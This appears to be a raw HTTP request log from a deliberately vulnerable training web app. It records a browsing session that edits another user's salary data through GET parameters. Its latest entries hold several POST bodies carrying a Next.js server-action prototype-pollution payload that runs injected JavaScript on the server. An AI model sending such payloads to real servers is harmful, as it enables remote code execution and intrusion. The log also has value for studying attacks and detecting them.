Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:33736
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-12 14:31:34] === HTTP Request ===
===================
------WebKitFormBoundaryx588743924863--
------WebKitFormBoundaryx588743924863
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx588743924863
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 268529+true+2192478;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx588743924863
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx588743924863
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_588743924863
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:33688
Path: /api
URL: /api
Method: POST
[2026-03-12 14:31:34] === HTTP Request ===
===================
------WebKitFormBoundaryx14550819186--
------WebKitFormBoundaryx14550819186
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx14550819186
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 22547+true+645355;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx14550819186
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx14550819186
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 512
X-Nextjs-Html-Request-Id: ilovepoop_14550819186
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:33678
Path: /_next
URL: /_next
Method: POST
[2026-03-12 14:31:30] === HTTP Request ===
[2026-03-12 14:31:30] Main page accessed - IP: 195.3.221.86:33670
===================
------WebKitFormBoundaryx2333212680449--
------WebKitFormBoundaryx2333212680449
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2333212680449
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 289264+true+8066032;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2333212680449
X-Nextjs-Request-Id: poop1234
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_2333212680449
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2333212680449
Content-Length: 522
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:33670
Path: /
URL: /
Method: POST
[2026-03-12 14:31:30] === HTTP Request ===
===================
Pragma: no-cache
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/salary
Sec-Fetch-Dest: script
Cookie: user_id=1; auth=sess_1773323198501875199
Cache-Control: no-cache
Accept-Language: en,ru;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Sec-Fetch-Mode: no-cors
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45128
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-12 14:30:49] === HTTP Request ===
[2026-03-12 14:30:49] Salary page accessed - IP: 172.30.0.12:45128
===================
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept-Language: en,ru;q=0.9
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 203.128.94.60
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Pragma: no-cache
Authorization: Bearer Bearer eyJhbGciOiJIU...
Priority: u=1, i
Cookie: user_id=1; auth=sess_1773323198501875199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45128
Path: /salary
URL: /salary
Method: GET
[2026-03-12 14:30:49] === HTTP Request ===
[2026-03-12 14:30:41] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
[2026-03-12 14:30:41] Update Financial Info - user_id: 17, wage: 11.10, total: 8842.25
===================
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Cache-Control: no-cache
Accept: */*
X-Forwarded-Proto: https
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en,ru;q=0.9
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Referer: https://admin.vulnberries.ru/cabinet?user=17
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Pragma: no-cache
Cookie: user_id=1; auth=sess_1773323198501875199
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45128
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-12 14:30:41] === HTTP Request ===
===================
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/cabinet?user=17
Cookie: user_id=1; auth=sess_1773323198501875199
Accept: */*
X-Forwarded-For: 203.128.94.60
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Pragma: no-cache
Accept-Language: en,ru;q=0.9
Priority: u=1, i
Cache-Control: no-cache
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Query: user_id=17&wage=11.10&total=8842.25
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=17&wage=11.10&total=8842.25
Method: GET
[2026-03-12 14:30:41] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Accept-Encoding: gzip, deflate, br, zstd
Cookie: user_id=1; auth=sess_1773323198501875199
Accept-Language: en,ru;q=0.9
Cache-Control: no-cache
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Referer: https://admin.vulnberries.ru/cabinet?user=17
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Pragma: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-12 14:30:39] === HTTP Request ===
[2026-03-12 14:30:39] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:45106
===================
Pragma: no-cache
Cache-Control: no-cache
Accept-Language: en,ru;q=0.9
Accept: */*
X-Forwarded-For: 203.128.94.60
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Cookie: user_id=1; auth=sess_1773323198501875199
Sec-Fetch-Dest: empty
Referer: https://admin.vulnberries.ru/
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
X-Forwarded-Proto: https
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-12 14:30:39] === HTTP Request ===
[2026-03-12 14:30:33] Main page accessed - IP: 172.30.0.12:45106
===================
Cookie: user_id=1; auth=sess_1773323198501875199
Cache-Control: no-cache
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Priority: u=1, i
Pragma: no-cache
Accept-Language: en,ru;q=0.9
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 203.128.94.60
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/salary
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /
URL: /
Method: GET
[2026-03-12 14:30:33] === HTTP Request ===
===================
Accept-Language: en,ru;q=0.9
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Pragma: no-cache
Referer: https://admin.vulnberries.ru/salary
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-For: 203.128.94.60
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "macOS"
Cookie: user_id=1; auth=sess_1773323198501875199
Cache-Control: no-cache
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-12 14:30:23] === HTTP Request ===
[2026-03-12 14:30:22] Salary page accessed - IP: 172.30.0.12:45106
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 203.128.94.60
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en,ru;q=0.9
Accept: */*
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/salary
Cache-Control: no-cache
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Priority: u=1, i
Pragma: no-cache
Cookie: user_id=1; auth=sess_1773323198501875199
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /salary
URL: /salary
Method: GET
[2026-03-12 14:30:22] === HTTP Request ===
===================
Via: 2.0 Caddy
Cookie: user_id=1; auth=sess_1773323198501875199
X-Forwarded-Proto: https
Cache-Control: no-cache
Accept-Language: en,ru;q=0.9
Accept: */*
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/salary
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 203.128.94.60
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-12 14:30:12] === HTTP Request ===
[2026-03-12 14:30:11] Salary page accessed - IP: 172.30.0.12:45106
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Pragma: no-cache
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 203.128.94.60
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/
Cookie: user_id=1; auth=sess_1773323198501875199
Sec-Fetch-Dest: empty
Cache-Control: no-cache
Accept-Language: en,ru;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /salary
URL: /salary
Method: GET
[2026-03-12 14:30:11] === HTTP Request ===
[2026-03-12 14:30:08] Main page accessed - IP: 172.30.0.12:45106
===================
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Cache-Control: no-cache
Accept-Language: en,ru;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Pragma: no-cache
Cookie: user_id=1; auth=sess_1773323198501875199
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Mode: cors
Priority: u=1, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /
URL: /
Method: GET
[2026-03-12 14:30:08] === HTTP Request ===
===================
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-Proto: https
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/cabinet?user=17
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Cookie: user_id=1; auth=sess_1773323198501875199
Accept-Language: en,ru;q=0.9
Accept: */*
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-For: 203.128.94.60
Sec-Fetch-Dest: script
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-12 14:30:07] === HTTP Request ===
[2026-03-12 14:30:06] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:45106
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/login
Accept-Encoding: gzip, deflate, br, zstd
Cookie: user_id=1; auth=sess_1773323198501875199
Accept-Language: en,ru;q=0.9
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Forwarded-For: 203.128.94.60
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-12 14:30:06] === HTTP Request ===
===================
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Pragma: no-cache
Referer: https://admin.vulnberries.ru/login
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1
Cookie: user_id=1; auth=sess_1773323198501875199
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en,ru;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-12 14:30:04] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-Proto: https
Priority: u=1
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Dest: script
Cookie: user_id=1; auth=sess_1773323198501875199
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Pragma: no-cache
Accept: */*
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Referer: https://admin.vulnberries.ru/login
Cache-Control: no-cache
Accept-Language: en,ru;q=0.9
X-Forwarded-For: 203.128.94.60
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-12 14:30:04] === HTTP Request ===
===================
Via: 2.0 Caddy
Sec-Fetch-Dest: style
Sec-Ch-Ua-Platform: "macOS"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Priority: u=0
Cookie: user_id=1; auth=sess_1773323198501875199
Accept-Language: en,ru;q=0.9
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/login
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-For: 203.128.94.60
Pragma: no-cache
Cache-Control: no-cache
Accept: text/css,*/*;q=0.1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-12 14:30:04] === HTTP Request ===
[2026-03-12 14:30:03] Login page accessed - IP: 172.30.0.12:45106
===================
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Pragma: no-cache
X-Forwarded-Proto: https
X-Forwarded-For: 203.128.94.60
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Cookie: user_id=1; auth=sess_1773323198501875199
Cache-Control: no-cache
Accept-Language: en,ru;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45106
Path: /login
URL: /login
Method: GET
[2026-03-12 14:30:03] === HTTP Request ===
===================
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Referer: https://admin.vulnberries.ru/cabinet?user=17
Cookie: user_id=1; auth=sess_1773323198501875199
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Pragma: no-cache
Accept: */*
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-For: 203.128.94.60
Sec-Ch-Ua-Platform: "macOS"
Cache-Control: no-cache
Accept-Language: en,ru;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60970
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-12 14:27:25] === HTTP Request ===
[2026-03-12 14:27:25] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:60970
===================
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/login
Priority: u=1, i
Accept-Language: en,ru;q=0.9
Accept: */*
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Sec-Ch-Ua-Platform: "macOS"
Pragma: no-cache
Cookie: user_id=1; auth=sess_1773323198501875199
Cache-Control: no-cache
X-Forwarded-Proto: https
X-Forwarded-For: 203.128.94.60
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60970
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-12 14:27:25] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en,ru;q=0.9
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Via: 2.0 Caddy
X-Forwarded-For: 203.128.94.60
Sec-Fetch-Mode: no-cors
Cookie: user_id=1; auth=sess_1773323198501875199
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Referer: https://admin.vulnberries.ru/login
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Dest: image
Sec-Ch-Ua-Platform: "macOS"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:60970
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-12 14:26:00] === HTTP Request ===
[2026-03-12 14:26:00] Login page accessed - IP: 172.30.0.12:60970
===================
X-Forwarded-For: 203.128.94.60
Accept-Language: en,ru;q=0.9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Priority: u=0, i
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Cookie: user_id=1; auth=sess_1773323198501875199
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="142", "YaBrowser";v="25.12", "Not_A Brand";v="99", "Yowser";v="2.5"
Referer: https://admin.vulnberries.ru/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 YaBrowser/25.12.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
